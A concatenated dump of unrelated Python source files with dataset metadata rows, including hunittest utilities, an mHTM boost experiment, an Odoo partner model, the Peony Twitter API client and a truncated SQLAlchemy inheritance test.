2 ratified ratify VERB VBD Mood=Ind|Tense=Past|VerbForm=Fin 0 root _ _
3 a a DET DT Definite=Ind|PronType=Art 5 det _ _
4 sweeping sweeping ADJ JJ Degree=Pos 5 amod _ _
5 agreement agreement NOUN NN Number=Sing 2 dobj _ _
6 with with ADP IN _ 9 case _ _
7 the the DET DT Definite=Def|PronType=Art 9 det _ _
8 European european PROPN NNP Number=Sing 9 compound _ _
9 Union Union PROPN NNP Number=Sing 5 nmod _ _
10 on on ADP IN _ 11 case _ _
11 Tuesday Tuesday PROPN NNP Number=Sing 2 nmod _ _
12 . . PUNCT . _ 2 punct _ _"""],
u'date': u'160626',
u'date_added': datetime.datetime(2016, 6, 26, 19, 0, 17, 640000),
u'_id': ObjectId('57702641172ab87eb7dc98fa')}]
def test_petr_formatted_to_results():
petr_ud_results = petrarch_ud.run_pipeline(formatted, write_output=False,
parsed=True)
print(petr_ud_results)
#assert petr_ud_results == correct1_results
if __name__ == "__main__":
test_petr_formatted_to_results()
| mit | 6,506,500,882,239,670,000 | 38.5 | 96 | 0.688874 | false | 2.267372 | false | false | false |
nicolasdespres/hunittest | hunittest/utils.py | 1 | 1667 | # -*- encoding: utf-8 -*-
"""Utility routines
"""
import os
import re
from enum import Enum
from contextlib import contextmanager
import sys
from io import StringIO
def pyname_join(seq):
return ".".join(seq)
def is_pkgdir(dirpath):
return os.path.isdir(dirpath) \
and os.path.isfile(os.path.join(dirpath, "__init__.py"))
def drop_pyext(pathname):
return re.sub(r"\.py$", "", pathname)
def mod_split(modname):
mo = re.match(r"^(.+)\.(.*)$", modname)
if not mo:
raise ValueError("invalid python path identifier")
return (mo.group(1), mo.group(2))
def is_empty_generator(generator):
try:
next(generator)
except StopIteration:
return True
else:
return False
class AutoEnum(Enum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def mkdir_p(path):
try:
os.makedirs(path)
except FileExistsError:
pass
@contextmanager
def protect_cwd(dirpath=None):
saved_cwd = os.getcwd()
if dirpath is not None:
os.chdir(dirpath)
try:
yield
finally:
os.chdir(saved_cwd)
def safe_getcwd():
try:
return os.getcwd()
except FileNotFoundError:
return None
@contextmanager
def silent_stderr():
old_stderr = sys.stderr
sys.stderr = StringIO()
try:
yield
finally:
sys.stderr = old_stderr
def ensure_trailing_slash(path):
if not path.endswith("/"):
return path + "/"
return path
def issubdir(filepath, dirpath):
return filepath.startswith(ensure_trailing_slash(dirpath))
| bsd-2-clause | 11,221,398,954,023,508 | 19.329268 | 64 | 0.612478 | false | 3.696231 | false | false | false |
tehtechguy/mHTM | dev/sp_math_pub/boost_experiment.py | 1 | 11796 | # boost_experiment.py
#
# Author : James Mnatzaganian
# Contact : http://techtorials.me
# Organization : NanoComputing Research Lab - Rochester Institute of
# Technology
# Website : https://www.rit.edu/kgcoe/nanolab/
# Date Created : 10/13/15
#
# Description : Study the boost.
# Python Version : 2.7.X
#
# License : MIT License http://opensource.org/licenses/mit-license.php
# Copyright : (c) 2016 James Mnatzaganian
"""
Study the boost.
G{packagetree mHTM}
"""
__docformat__ = 'epytext'
# Native imports
import cPickle, random, csv, os, time, json
# Third party imports
import numpy as np
import bottleneck as bn
import matplotlib.pyplot as plt
from joblib import Parallel, delayed
# Program imports
from mHTM.region import SPRegion
from mHTM.plot import plot_error, compute_err
def make_data(p, nitems=100, width=100, density=0.9, seed=123456789):
"""
Make the dataset.
@param p: the full path to where the dataset should be created.
@param nitems: The number of items to create.
@param width: The size of the input.
@param density: The percentage of active bits.
@param seed: The random number seed.
"""
# Initialization
random.seed(seed)
np.random.seed(seed)
nactive = int(width * density)
# Build the dataset
ds = np.zeros((nitems, width), dtype='bool')
for i in xrange(nitems):
indexes = set(np.random.randint(0, width, nactive))
while len(indexes) != nactive:
indexes.add(random.randint(0, width - 1))
ds[i][list(indexes)] = True
# Write the file
with open(p, 'wb') as f:
cPickle.dump(ds, f, cPickle.HIGHEST_PROTOCOL)
def load_data(p):
"""
Get the dataset.
@param p: the full path to the dataset.
"""
with open(p, 'rb') as f:
ds = cPickle.load(f)
return ds
def _phase3(self):
"""
Normal phase 3, but with tracking the boost changes. Double commented lines
are new.
"""
# Update permanences
self.p = np.clip(self.p + (self.c_pupdate * self.y[:, 0:1] *
self.x[self.syn_map] - self.pdec * self.y[:, 0:1]), 0, 1)
if self.disable_boost is False:
# Update the boosting mechanisms
if self.global_inhibition:
min_dc = np.zeros(self.ncolumns)
min_dc.fill(self.c_mdc * bn.nanmax(self.active_dc))
else:
min_dc = self.c_mdc * bn.nanmax(self.neighbors * self.active_dc, 1)
## Save pre-overlap boost info
boost = list(self.boost)
# Update boost
self._update_active_duty_cycle()
self._update_boost(min_dc)
self._update_overlap_duty_cycle()
## Write out overlap boost changes
with open(os.path.join(self.out_path, 'overlap_boost.csv'), 'ab') as f:
writer = csv.writer(f)
writer.writerow([self.iter, bn.nanmean(boost != self.boost)])
# Boost permanences
mask = self.overlap_dc < min_dc
mask.resize(self.ncolumns, 1)
self.p = np.clip(self.p + self.c_sboost * mask, 0, 1)
## Write out permanence boost info
with open(os.path.join(self.out_path, 'permanence_boost.csv'), 'ab') \
as f:
writer = csv.writer(f)
writer.writerow([self.iter, bn.nanmean(mask)])
# Trim synapses
if self.trim is not False:
self.p[self.p < self.trim] = 0
def main(ds, p, ncols=2048, duty_cycle=100, nepochs=10, global_inhibition=True,
seed=123456789):
"""
Run an experiment.
@param ds: The dataset.
@param p: The full path to the directory to save the results.
@param ncols: The number of columns.
@param duty_cycle: The duty cycle.
@param nepochs: The number of epochs
@param global_inhibition: If True use global inhibition otherwise use local
inhibition.
@param seed: The random seed.
"""
# Get some parameters
ninputs = ds.shape[1]
density = np.sum(ds[0]) / float(ninputs)
# Make the directory if it doesn't exist
try:
os.makedirs(p)
except OSError:
pass
# Initializations
np.random.seed(seed)
kargs = {
'ninputs': ninputs,
'ncolumns': ncols,
'nsynapses': 40,
'random_permanence': True,
'pinc':0.03, 'pdec':0.05,
'seg_th': 15,
'nactive': int(0.02 * ncols),
'duty_cycle': duty_cycle,
'max_boost': 10,
'global_inhibition': global_inhibition,
'trim': 1e-4
}
# Create the region
delattr(SPRegion, '_phase3')
setattr(SPRegion, '_phase3', _phase3)
sp = SPRegion(**kargs)
sp.iter, sp.out_path = 1, p
# Train the region
t = time.time()
for i in xrange(nepochs):
for j, x in enumerate(ds):
sp.execute(x)
sp.iter += 1
t = time.time() - t
# Dump the details
kargs['density'] = density
kargs['seed'] = seed
kargs['nepochs'] = nepochs
kargs['time'] = t
with open(os.path.join(p, 'details.json'), 'wb') as f:
f.write(json.dumps(kargs, sort_keys=True, indent=4,
separators=(',', ': ')))
def vary_density(bp, global_inhibition=True):
"""
Vary the density level.
@pram bp: The base path.
@param global_inhibition: If True use global inhibition otherwise use local
inhibition.
"""
# density_levels = np.arange(1, 100, 1)
density_levels = np.arange(28, 100, 1)
for density in density_levels:
print density
p = os.path.join(bp, str(density))
p2 = os.path.join(p, 'data.pkl')
try:
os.makedirs(p)
except OSError:
pass
make_data(p2, density=density/100., seed=123456789)
# Repeat for good results
Parallel(n_jobs=-1)(delayed(main)(load_data(p2),
os.path.join(p, str(i)), global_inhibition=global_inhibition,
seed=i) for i in xrange(10))
def vary_dutycycle(bp, ds, global_inhibition=True):
"""
Vary the duty cycles.
@pram bp: The base path.
@param ds: The dataset to use.
@param global_inhibition: If True use global inhibition otherwise use local
inhibition.
"""
duty_cycles = (1, 10, 100, 1000, 10000)
try:
os.makedirs(bp)
except OSError:
pass
for dc in duty_cycles:
print '\n\n\n --------{0}-------- \n\n\n'.format(dc)
p = os.path.join(bp, str(dc))
main(ds, p, duty_cycle=dc, nepochs=1,
global_inhibition=global_inhibition)
def plot_density_results(bp, bp2=None):
"""
Average the results.
@param bp: The base path.
@param bp2: The second base path.
"""
def average(p):
"""
Compute the average activations for each density.
@param p: The path to the file.
@return: The average.
"""
with open(p, 'rb') as f:
reader = csv.reader(f)
data = []
for row in reader:
data.append(float(row[1]))
return np.mean(data) * 100
def get_data(p):
"""
Get the data for a single run.
@param p: The path.
@return: A tuple containing the overlap and permanences.
"""
overlap, permanence = [], []
for d in os.listdir(p):
npath = os.path.join(p, d)
if os.path.isdir(npath):
overlap.append(average(os.path.join(npath,
'overlap_boost.csv')))
permanence.append(average(os.path.join(npath,
'permanence_boost.csv')))
return np.array(overlap), np.array(permanence)
def get_all_data(bp):
"""
Get the data for all runs.
@param bp: The base path.
@return: A tuple containing the sparsity, overlap, and permanences.
"""
overlap, permanence, sparsity = [], [], []
for d in sorted([int(x) for x in os.listdir(bp)]):
sparsity.append((1 - (d / 100.)) * 100)
o, p = get_data(os.path.join(bp, str(d)))
overlap.append(o)
permanence.append(p)
return np.array(sparsity[::-1]), np.array(overlap[::-1]), \
np.array(permanence[::-1])
def make_plot_params(sparsity, overlap, permanence, title=None):
"""
Generate the parameters for the plot.
@param sparsity: The sparsity array.
@param overlap: The overlap array.
@param permanence: The permanence array.
@param title: The title for the plot.
@return: A dictionary with the parameters.
"""
return {'x_series':(sparsity, sparsity),
'y_series':(np.median(overlap, 1), np.median(permanence, 1)),
'series_names':('Overlap Boosting', 'Permanence Boosting'),
'y_errs':(compute_err(overlap), compute_err(permanence)),
'xlim':(0, 100), 'ylim':(0, 45), 'title':title
}
data = get_all_data(bp)
if bp2 is None:
plot_error(**make_plot_params(*data))
else:
# Make main plot
fig = plt.figure(figsize=(21, 20), facecolor='white')
ax = fig.add_subplot(111)
ax.spines['top'].set_color('none')
ax.spines['bottom'].set_color('none')
ax.spines['left'].set_color('none')
ax.spines['right'].set_color('none')
ax.tick_params(labelcolor='w', top='off', bottom='off', left='off',
right='off')
ax.set_xlabel('Sparsity [%]')
ax.set_ylabel('% Columns Boosted')
# Make subplots
ax1 = fig.add_subplot(211)
plot_error(show=False, legend=False, ax=ax1, **make_plot_params(*data,
title='Global Inhibition'))
data2 = get_all_data(bp2)
ax2 = fig.add_subplot(212, sharex=ax1, sharey=ax1)
plot_error(show=False, ax=ax2, **make_plot_params(*data2,
title='Local Inhibition'))
# Save it
# plt.show()
plt.subplots_adjust(bottom=0.15, hspace=0.3)
plt.savefig('boost_sparseness.png', format='png',
facecolor=fig.get_facecolor(), edgecolor='none')
def plot_single_run(bp1, bp2):
"""
Create an error plot for a single run.
@param bp1: The base path for global inhibition results.
@param bp2: The base path for local inhibition results.
"""
def read(p):
"""
Read in the data.
@param p: The path to the file to read.
@return: The results.
"""
with open(p, 'rb') as f:
reader = csv.reader(f)
data = []
for row in reader:
data.append(float(row[1]))
return np.array(data) * 100
def get_data(p):
"""
Get all of the results.
@param p: The directory to obtain the data in.
@return: The results.
"""
permanence = []
for d in os.listdir(p):
npath = os.path.join(p, d)
if os.path.isdir(npath):
permanence.append(read(os.path.join(npath,
'permanence_boost.csv')))
return np.array(permanence)
# Get the data
data = [get_data(bp1)]
data.append(get_data(bp2))
# Build the series
x_series = (np.arange(data[0].shape[1]), )
# Make the main plot
fig = plt.figure(figsize=(21, 20), facecolor='white')
ax = fig.add_subplot(111)
ax.spines['top'].set_color('none')
ax.spines['bottom'].set_color('none')
ax.spines['left'].set_color('none')
ax.spines['right'].set_color('none')
ax.tick_params(labelcolor='w', top='off', bottom='off', left='off',
right='off')
ax.set_xlabel('Iteration')
ax.set_ylabel('% Columns Boosted')
# Make subplots
ax1 = fig.add_subplot(211)
plot_error(show=False, legend=False, ax=ax1, title='Global Inhibition',
x_series=x_series, y_series=(np.median(data[0], 0), ),
y_errs=(compute_err(data[0], axis=0),), xlim=(0, 200), ylim=(0, 100))
ax2 = fig.add_subplot(212, sharex=ax1, sharey=ax1)
plot_error(show=False, ax=ax2, title='Local Inhibition', legend=False,
x_series=x_series, y_series=(np.median(data[1], 0), ),
y_errs=(compute_err(data[1], axis=0),), xlim=(0, 200), ylim=(0, 100))
# Save it
# plt.show()
plt.subplots_adjust(bottom=0.15, hspace=0.3)
plt.savefig('boost_permanence.png', format='png',
facecolor=fig.get_facecolor(), edgecolor='none')
if __name__ == '__main__':
# Params
base_dir = os.path.join(os.path.expanduser('~'), 'scratch')
p1 = os.path.join(base_dir, 'boost_experiments-global-2')
p2 = os.path.join(base_dir, 'boost_experiments-local-2')
# Experiment
vary_density(p1, True)
vary_density(p2, False)
plot_density_results(p1, p2)
density = '26'
plot_single_run(os.path.join(p1, density), os.path.join(p2, density))
| mit | -8,973,424,034,394,797,000 | 24.039735 | 79 | 0.629281 | false | 2.797249 | false | false | false |
CLVsol/clvsol_odoo_addons | clv_patient/models/res_partner.py | 1 | 2990 | # -*- coding: utf-8 -*-
# Copyright 2008 Luis Falcon <[email protected]>
# Copyright 2016 LasLabs Inc.
# License GPL-3.0 or later (http://www.gnu.org/licenses/gpl.html).
from datetime import datetime
from odoo import _, api, fields, models
from odoo.exceptions import ValidationError
class ResPartner(models.Model):
_inherit = 'res.partner'
type = fields.Selection(selection_add=[
('clv.patient', 'Patient'),
])
# alias = fields.Char(
# string='Alias',
# help='Common name that the Partner is referred',
# )
patient_ids = fields.One2many(
string='Related Patients',
comodel_name='clv.patient',
compute='_compute_patient_ids_and_count',
)
count_patients = fields.Integer(
compute='_compute_patient_ids_and_count',
)
# birthdate_date = fields.Date(
# string='Birthdate',
# )
# gender = fields.Selection([
# ('male', 'Male'),
# ('female', 'Female'),
# ('other', 'Other'),
# ])
# weight = fields.Float()
# weight_uom = fields.Many2one(
# string="Weight UoM",
# comodel_name="product.uom",
# default=lambda s: s.env['res.lang'].default_uom_by_category('Weight'),
# domain=lambda self: [('category_id', '=',
# self.env.ref('product.product_uom_categ_kgm').id)
# ]
# )
@api.multi
def _get_clv_entity(self):
self.ensure_one()
if self.type and self.type[:3] == 'clv':
return self.env[self.type].search([
('partner_id', '=', self.id),
])
@api.multi
def _compute_patient_ids_and_count(self):
for record in self:
patients = self.env['clv.patient'].search([
('partner_id', 'child_of', record.id),
])
record.count_patients = len(patients)
record.patient_ids = [(6, 0, patients.ids)]
# @api.multi
# @api.constrains('birthdate_date')
# def _check_birthdate_date(self):
# """ It will not allow birthdates in the future. """
# now = datetime.now()
# for record in self:
# if not record.birthdate_date:
# continue
# birthdate = fields.Datetime.from_string(record.birthdate_date)
# if birthdate > now:
# raise ValidationError(_(
# 'Partners cannot be born in the future.',
# ))
@api.model
def create(self, vals):
""" It overrides create to bind appropriate clv entity. """
if all((
vals.get('type', '').startswith('clv.'),
not self.env.context.get('clv_entity_no_create'),
)):
model = self.env[vals['type']].with_context(
clv_entity_no_create=True,
)
clv_entity = model.create(vals)
return clv_entity.partner_id
return super().create(vals)
| agpl-3.0 | 1,173,964,329,214,253,600 | 32.222222 | 81 | 0.53913 | false | 3.63747 | false | false | false |
odrling/peony-twitter | peony/client.py | 1 | 21586 | # -*- coding: utf-8 -*-
"""
Peony Clients
:class:`BasePeonyClient` only handles requests while
:class:`PeonyClient` adds some methods that could help when using
the Twitter APIs, with a method to upload a media
"""
import asyncio
import io
from contextlib import suppress
import logging
try:
from asyncio.exceptions import CancelledError
except ImportError: # pragma: no cover
from concurrent.futures import CancelledError
from urllib.parse import urlparse
import aiohttp
from . import data_processing, exceptions, general, oauth, utils
from .api import APIPath, StreamingAPIPath
from .commands import EventStreams, task
from .exceptions import PeonyUnavailableMethod
from .oauth import OAuth1Headers
from .stream import StreamResponse
logger = logging.getLogger(__name__)
class MetaPeonyClient(type):
def __new__(cls, name, bases, attrs, **kwargs):
""" put the :class:`~peony.commands.tasks.Task`s in the right place """
tasks = {'tasks': set()}
for base in bases:
if hasattr(base, '_tasks'):
for key, value in base._tasks.items():
tasks[key] |= value
for attr in attrs.values():
if isinstance(attr, task):
tasks['tasks'].add(attr)
attrs['_tasks'] = tasks
attrs['_streams'] = EventStreams()
return super().__new__(cls, name, bases, attrs)
class BasePeonyClient(metaclass=MetaPeonyClient):
"""
Access the Twitter API easily
You can create tasks by decorating a function from a child
class with :class:`peony.task`
You also attach a :class:`EventStream` to a subclass using
the :func:`event_stream` of the subclass
After creating an instance of the child class you will be able
to run all the tasks easily by executing :func:`get_tasks`
Parameters
----------
streaming_apis : iterable, optional
Iterable containing the streaming APIs subdomains
base_url : str, optional
Format of the url for all the requests
api_version : str, optional
Default API version
suffix : str, optional
Default suffix of API endpoints
loads : function, optional
Function used to load JSON data
error_handler : function, optional
Requests decorator
session : aiohttp.ClientSession, optional
Session to use to make requests
proxy : str
Proxy used with every request
compression : bool, optional
Activate data compression on every requests, defaults to True
user_agent : str, optional
Set a custom user agent header
encoding : str, optional
text encoding of the response from the server
loop : event loop, optional
An event loop, if not specified :func:`asyncio.get_event_loop`
is called
"""
def __init__(self,
consumer_key=None,
consumer_secret=None,
access_token=None,
access_token_secret=None,
bearer_token=None,
auth=None,
headers=None,
streaming_apis=None,
base_url=None,
api_version=None,
suffix='.json',
loads=data_processing.loads,
error_handler=utils.DefaultErrorHandler,
session=None,
proxy=None,
compression=True,
user_agent=None,
encoding=None,
loop=None,
**kwargs):
if streaming_apis is None:
self.streaming_apis = general.streaming_apis
else:
self.streaming_apis = streaming_apis
if base_url is None:
self.base_url = general.twitter_base_api_url
else:
self.base_url = base_url
if api_version is None:
self.api_version = general.twitter_api_version
else:
self.api_version = api_version
if auth is None:
auth = OAuth1Headers
self.proxy = proxy
self._suffix = suffix
self.error_handler = error_handler
self.encoding = encoding
if encoding is not None:
def _loads(*args, **kwargs):
return loads(*args, encoding=encoding, **kwargs)
self._loads = _loads
else:
self._loads = loads
self.loop = asyncio.get_event_loop() if loop is None else loop
self._session = session
self._user_session = session is not None
self._gathered_tasks = None
if consumer_key is None or consumer_secret is None:
raise TypeError("missing 2 required arguments: 'consumer_key' "
"and 'consumer_secret'")
# all the possible args required by headers in :mod:`peony.oauth`
kwargs = {
'consumer_key': consumer_key,
'consumer_secret': consumer_secret,
'access_token': access_token,
'access_token_secret': access_token_secret,
'bearer_token': bearer_token,
'compression': compression,
'user_agent': user_agent,
'headers': headers,
'client': self
}
# get the args needed by the auth parameter on initialization
args = utils.get_args(auth.__init__, skip=1)
# keep only the arguments required by auth on init
kwargs = {key: value for key, value in kwargs.items()
if key in args}
self.headers = auth(**kwargs)
self.setup = self.loop.create_task(self._setup())
async def _setup(self):
if self._session is None:
logger.debug("Creating session")
self._session = aiohttp.ClientSession()
@staticmethod
def _get_base_url(base_url, api, version):
"""
create the base url for the api
Parameters
----------
base_url : str
format of the base_url using {api} and {version}
api : str
name of the api to use
version : str
version of the api
Returns
-------
str
the base url of the api you want to use
"""
format_args = {}
if "{api}" in base_url:
if api == "":
base_url = base_url.replace('{api}.', '')
else:
format_args['api'] = api
if "{version}" in base_url:
if version == "":
base_url = base_url.replace('/{version}', '')
else:
format_args['version'] = version
return base_url.format(api=api, version=version)
def __getitem__(self, values):
"""
Access the api you want
This permits the use of any API you could know about
For most api you only need to type
>>> self[api] # api is the api you want to access
You can specify a custom api version using the syntax
>>> self[api, version] # version is the api version as a str
For more complex requests
>>> self[api, version, suffix, base_url]
Returns
-------
.api.BaseAPIPath
To access an API endpoint
"""
defaults = None, self.api_version, self._suffix, self.base_url
keys = ['api', 'version', 'suffix', 'base_url']
if isinstance(values, dict):
# set values in the right order
values = [values.get(key, defaults[i])
for i, key in enumerate(keys)]
elif isinstance(values, set):
raise TypeError('Cannot use a set to access an api, '
'please use a dict, a tuple or a list instead')
elif isinstance(values, str):
values = [values, *defaults[1:]]
elif isinstance(values, tuple):
if len(values) < len(keys):
padding = (None,) * (len(keys) - len(values))
values += padding
values = [default if value is None else value
for value, default in zip(values, defaults)
if (value, default) != (None, None)]
else:
raise TypeError("Could not create an endpoint from an object of "
"type " + values.__class__.__name__)
api, version, suffix, base_url = values
base_url = self._get_base_url(base_url, api, version)
# use StreamingAPIPath if subdomain is in self.streaming_apis
if api in self.streaming_apis:
return StreamingAPIPath([base_url], suffix=suffix, client=self)
else:
return APIPath([base_url], suffix=suffix, client=self)
__getattr__ = __getitem__
def __del__(self):
if self.loop.is_closed(): # pragma: no cover
pass
elif self.loop.is_running():
self.loop.create_task(self.close())
else:
self.loop.run_until_complete(self.close())
async def request(self, method, url, future,
headers=None,
session=None,
encoding=None,
**kwargs):
"""
Make requests to the REST API
Parameters
----------
future : asyncio.Future
Future used to return the response
method : str
Method to be used by the request
url : str
URL of the resource
headers : .oauth.PeonyHeaders
Custom headers (doesn't overwrite `Authorization` headers)
session : aiohttp.ClientSession, optional
Client session used to make the request
Returns
-------
data.PeonyResponse
Response to the request
"""
await self.setup
# prepare request arguments, particularly the headers
req_kwargs = await self.headers.prepare_request(
method=method,
url=url,
headers=headers,
proxy=self.proxy,
**kwargs
)
if encoding is None:
encoding = self.encoding
session = session if (session is not None) else self._session
logger.debug("making request with parameters: %s" % req_kwargs)
async with session.request(**req_kwargs) as response:
if response.status < 400:
data = await data_processing.read(response, self._loads,
encoding=encoding)
future.set_result(data_processing.PeonyResponse(
data=data,
headers=response.headers,
url=response.url,
request=req_kwargs
))
else: # throw exception if status is not 2xx
await exceptions.throw(response, loads=self._loads,
encoding=encoding, url=url)
def stream_request(self, method, url, headers=None, _session=None,
*args, **kwargs):
"""
Make requests to the Streaming API
Parameters
----------
method : str
Method to be used by the request
url : str
URL of the resource
headers : dict
Custom headers (doesn't overwrite `Authorization` headers)
_session : aiohttp.ClientSession, optional
The session to use for this specific request, the session
given as argument of :meth:`__init__` is used by default
Returns
-------
.stream.StreamResponse
Stream context for the request
"""
return StreamResponse(
method=method,
url=url,
client=self,
headers=headers,
session=_session,
proxy=self.proxy,
**kwargs
)
@classmethod
def event_stream(cls, event_stream):
""" Decorator to attach an event stream to the class """
cls._streams.append(event_stream)
return event_stream
def _get_tasks(self):
return [task(self) for task in self._tasks['tasks']]
def get_tasks(self):
"""
Get the tasks attached to the instance
Returns
-------
list
List of tasks (:class:`asyncio.Task`)
"""
tasks = self._get_tasks()
tasks.extend(self._streams.get_tasks(self))
return tasks
async def run_tasks(self):
""" Run the tasks attached to the instance """
tasks = self.get_tasks()
self._gathered_tasks = asyncio.gather(*tasks, loop=self.loop)
try:
await self._gathered_tasks
except CancelledError:
pass
async def arun(self):
try:
await self.run_tasks()
except KeyboardInterrupt:
pass
finally:
await self.close()
def run(self):
""" Run the tasks attached to the instance """
self.loop.run_until_complete(self.arun())
def _get_close_tasks(self):
tasks = []
# cancel setup
if isinstance(self.setup, asyncio.Future):
if not self.setup.done():
async def cancel_setup():
self.setup.cancel()
try:
await self.setup
except CancelledError: # pragma: no cover
pass
tasks.append(self.loop.create_task(cancel_setup()))
# close currently running tasks
if self._gathered_tasks is not None:
async def cancel_tasks():
self._gathered_tasks.cancel()
try:
await self._gathered_tasks
except CancelledError:
pass
tasks.append(self.loop.create_task(cancel_tasks()))
return tasks
async def close(self):
""" properly close the client """
tasks = self._get_close_tasks()
if tasks:
await asyncio.wait(tasks)
# close the session only if it was created by peony
if not self._user_session and self._session is not None:
with suppress(TypeError, AttributeError):
await self._session.close()
self._session = None
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
await self.close()
class PeonyClient(BasePeonyClient):
"""
A client with some useful methods for most usages
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.user = self.loop.create_task(self._get_user())
async def _get_user(self, init=False):
"""
create a ``user`` attribute with the response of the endpoint
https://api.twitter.com/1.1/account/verify_credentials.json
"""
api = self['api', general.twitter_api_version,
".json", general.twitter_base_api_url]
if isinstance(self.headers, oauth.OAuth1Headers):
return await api.account.verify_credentials.get()
raise PeonyUnavailableMethod("user attribute is only available with "
"OAuth 1 authentification.")
def _get_close_tasks(self):
tasks = super()._get_close_tasks()
if not self.user.done():
async def cancel_user():
self.user.cancel()
try:
await self.user
except CancelledError: # pragma: no cover
pass
tasks.append(self.loop.create_task(cancel_user()))
return tasks
async def _chunked_upload(self, media, media_size,
path=None,
media_type=None,
media_category=None,
chunk_size=2**20,
**params):
"""
upload media in chunks
Parameters
----------
media : file object
a file object of the media
media_size : int
size of the media
path : str, optional
filename of the media
media_type : str, optional
mime type of the media
media_category : str, optional
twitter media category, must be used with ``media_type``
chunk_size : int, optional
size of a chunk in bytes
params : dict, optional
additional parameters of the request
Returns
-------
.data_processing.PeonyResponse
Response of the request
"""
if isinstance(media, bytes):
media = io.BytesIO(media)
chunk = media.read(chunk_size)
is_coro = asyncio.iscoroutine(chunk)
if is_coro:
chunk = await chunk
if media_type is None:
media_metadata = await utils.get_media_metadata(chunk, path)
media_type, media_category = media_metadata
elif media_category is None:
media_category = utils.get_category(media_type)
response = await self.upload.media.upload.post(
command="INIT",
total_bytes=media_size,
media_type=media_type,
media_category=media_category,
**params
)
media_id = response['media_id']
i = 0
while chunk:
req = self.upload.media.upload.post(command="APPEND",
media_id=media_id,
media=chunk,
segment_index=i)
if is_coro:
chunk, _ = await asyncio.gather(media.read(chunk_size), req)
else:
await req
chunk = media.read(chunk_size)
i += 1
status = await self.upload.media.upload.post(command="FINALIZE",
media_id=media_id)
if 'processing_info' in status:
while status['processing_info'].get('state') != "succeeded":
processing_info = status['processing_info']
if processing_info.get('state') == "failed":
error = processing_info.get('error', {})
message = error.get('message', str(status))
raise exceptions.MediaProcessingError(data=status,
message=message,
**params)
delay = processing_info['check_after_secs']
await asyncio.sleep(delay)
status = await self.upload.media.upload.get(
command="STATUS",
media_id=media_id,
**params
)
return response
async def upload_media(self, file_,
media_type=None,
media_category=None,
chunked=None,
size_limit=3 * (1024**2),
**params):
"""
upload a media file on twitter
Parameters
----------
file_ : str or pathlib.Path or file
Path to the file or file object
media_type : str, optional
mime type of the media
media_category : str, optional
Twitter's media category of the media, must be used with
``media_type``
chunked : bool, optional
If True, force the use of the chunked upload for the media
size_limit : int, optional
If set, the media will be sent using a multipart upload if
its size is over ``size_limit`` bytes
params : dict
parameters used when making the request
Returns
-------
.data_processing.PeonyResponse
Response of the request
"""
if isinstance(file_, str):
url = urlparse(file_)
if url.scheme.startswith('http'):
media = await self._session.get(file_)
else:
path = urlparse(file_).path.strip(" \"'")
media = await utils.execute(open(path, 'rb'))
elif hasattr(file_, 'read') or isinstance(file_, bytes):
media = file_
else:
raise TypeError("upload_media input must be a file object or a "
"filename or binary data or an aiohttp request")
media_size = await utils.get_size(media)
if chunked is not None:
size_test = False
else:
size_test = media_size > size_limit
if isinstance(media, aiohttp.ClientResponse):
# send the content of the response
media = media.content
if chunked or (size_test and chunked is None):
args = media, media_size, file_, media_type, media_category
response = await self._chunked_upload(*args, **params)
else:
response = await self.upload.media.upload.post(media=media,
**params)
if not hasattr(file_, 'read') and not getattr(media, 'closed', True):
media.close()
return response
| mit | 5,343,106,315,839,828,000 | 30.837758 | 79 | 0.530714 | false | 4.803293 | false | false | false |
mastizada/kuma | vendor/packages/sqlalchemy/test/orm/inheritance/test_magazine.py | 7 | 9296 | from sqlalchemy import *
from sqlalchemy.orm import *
from sqlalchemy.test import testing
from sqlalchemy.util import function_named
from test.orm import _base
from sqlalchemy.test.schema import Table, Column
class BaseObject(object):
def __init__(self, *args, **kwargs):
for key, value in kwargs.iteritems():
setattr(self, key, value)
class Publication(BaseObject):
pass
class Issue(BaseObject):
pass
class Location(BaseObject):
def __repr__(self):
return "%s(%s, %s)" % (self.__class__.__name__, str(getattr(self, 'issue_id', None)), repr(str(self._name.name)))
def _get_name(self):
return self._name
def _set_name(self, name):
session = create_session()
s = session.query(LocationName).filter(LocationName.name==name).first()
session.expunge_all()
if s is not None:
self._name = s
return
found = False
for i in session.new:
if isinstance(i, LocationName) and i.name == name:
self._name = i
found = True
break
if found == False:
self._name = LocationName(name=name)
name = property(_get_name, _set_name)
class LocationName(BaseObject):
def __repr__(self):
return "%s()" % (self.__class__.__name__)
class PageSize(BaseObject):
def __repr__(self):
return "%s(%sx%s, %s)" % (self.__class__.__name__, self.width, self.height, self.name)
class Magazine(BaseObject):
def __repr__(self):
return "%s(%s, %s)" % (self.__class__.__name__, repr(self.location), repr(self.size))
class Page(BaseObject):
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, str(self.page_no))
class MagazinePage(Page):
def __repr__(self):
return "%s(%s, %s)" % (self.__class__.__name__, str(self.page_no), repr(self.magazine))
class ClassifiedPage(MagazinePage):
pass
class MagazineTest(_base.MappedTest):
@classmethod
def define_tables(cls, metadata):
global publication_table, issue_table, location_table, location_name_table, magazine_table, \
page_table, magazine_page_table, classified_page_table, page_size_table
publication_table = Table('publication', metadata,
Column('id', Integer, primary_key=True, test_needs_autoincrement=True),
Column('name', String(45), default=''),
)
issue_table = Table('issue', metadata,
Column('id', Integer, primary_key=True, test_needs_autoincrement=True),
Column('publication_id', Integer, ForeignKey('publication.id')),
Column('issue', Integer),
)
location_table = Table('location', metadata,
Column('id', Integer, primary_key=True, test_needs_autoincrement=True),
Column('issue_id', Integer, ForeignKey('issue.id')),
Column('ref', CHAR(3), default=''),
Column('location_name_id', Integer, ForeignKey('location_name.id')),
)
location_name_table = Table('location_name', metadata,
Column('id', Integer, primary_key=True, test_needs_autoincrement=True),
Column('name', String(45), default=''),
)
magazine_table = Table('magazine', metadata,
Column('id', Integer, primary_key=True, test_needs_autoincrement=True),
Column('location_id', Integer, ForeignKey('location.id')),
Column('page_size_id', Integer, ForeignKey('page_size.id')),
)
page_table = Table('page', metadata,
Column('id', Integer, primary_key=True, test_needs_autoincrement=True),
Column('page_no', Integer),
Column('type', CHAR(1), default='p'),
)
magazine_page_table = Table('magazine_page', metadata,
Column('page_id', Integer, ForeignKey('page.id'), primary_key=True),
Column('magazine_id', Integer, ForeignKey('magazine.id')),
Column('orders', Text, default=''),
)
classified_page_table = Table('classified_page', metadata,
